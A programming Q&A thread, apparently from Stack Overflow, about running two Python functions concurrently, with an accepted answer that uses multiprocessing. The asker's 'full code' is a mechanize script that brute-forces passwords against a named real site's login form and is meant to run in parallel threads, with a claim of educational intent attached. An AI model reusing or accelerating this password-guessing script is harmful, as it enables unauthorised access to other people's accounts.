# How to Multithread functions in Python?

Tags: python, multithreading

I have made 2 functions in Python that have loop command.
For making process faster, i wanted to multithread them.

For example:

```
def loop1():
    while 1 < 2:
        print "something"

def loop2():
    while 5 > 4:
        print "something1"
```

How can i run both of those, so it can loop something like this this:

```
something
something1
something
something1
```

I have tried this:

```
import threading
from threading import Thread

def loop1():
    print "Something"

def loop2():
    print "Something1"

if __name__ == '__main__':
    Thread(target = loop1).start()
    Thread(target = loop2).start()
```

But it gave me HTML error and just started running loop1.

Full Code:

```
import mechanize 
import itertools
import string
import threading
from threading import Thread

br = mechanize.Browser() 
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)

response = br.open("http://arkhamnetwork.org/community/login/")

br.addheaders = [("User-agent","Mozilla/5.0")] 

def loop1():
    br.open("http://arkhamnetwork.org/community/login")
    start = 1
    end = 2
    for length in range(start, end+1):
        for c in itertools.combinations_with_replacement(string.ascii_letters + string.digits, length):
            br.select_form(nr=4)  
            br.set_all_readonly(False)
            br.form['password'] = ''.join(c)
            print "test",br.form['password'] 
            br.method = "POST"
            response = br.submit()
            if response.geturl()=="http://arkhamnetwork.org/community/":
                print "test ",''.join(x)
                break

def loop2():
    br.open("http://arkhamnetwork.org/community/login")
    start1 = 2
    end1 = 3
    for length in range(start1, end1+1):
        for c in itertools.combinations_with_replacement(string.ascii_letters + string.digits, length):
            br.select_form(nr=4)  
            br.set_all_readonly(False)
            br.form['password'] = ''.join(c)
            print "test",br.form['password'] 
            br.method = "POST"
            response = br.submit()
            if response.geturl()=="http://arkhamnetwork.org/community/":
                print "test",''.join(x)
                break

if __name__ == '__main__':
    Thread(target = loop1).start()
    Thread(target = loop2).start()  # NOTE: i'm not trying to attack anyone or any site with this, I'm just testing out code for educational purposes.
```

The Error it gave me:

```
[test] Trying a
Exception in thread Thread-2:
Traceback (most recent call last):
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 810, in __bootstrap_inner
    self.run()
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 763, in run
    self.__target(*self.__args, **self.__kwargs)
  File "just.py", line 39, in loop2
    br.select_form(nr=4)
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/mechanize/_mechanize.py", line 506, in select_form
    for form in self.forms():
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/mechanize/_mechanize.py", line 418, in forms
    if not self.viewing_html():
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/mechanize/_mechanize.py", line 443, in viewing_html
    raise BrowserStateError("not viewing any document")
BrowserStateError: not viewing any document
```

and it kept looping 1.

Comment: `br` is shared and maybe it is not thread-safe, try creating one in each function (thread).

Answer (score 2, accepted):

## Found out solution:

```
from multiprocessing import Process

def loop1():
    while 1 < 2:
        print "something"


def loop2():
    while 5 > 4:
        print "something1"  


if __name__=='__main__':
     p1 = Process(target = loop1)
     p1.start()
     p2 = Process(target = loop2)
     p2.start()
```

This code will run multipe functions together.  Not entirely sure why thread version didn't work, but i think it is converting function to thread, and is not made for multi-threading.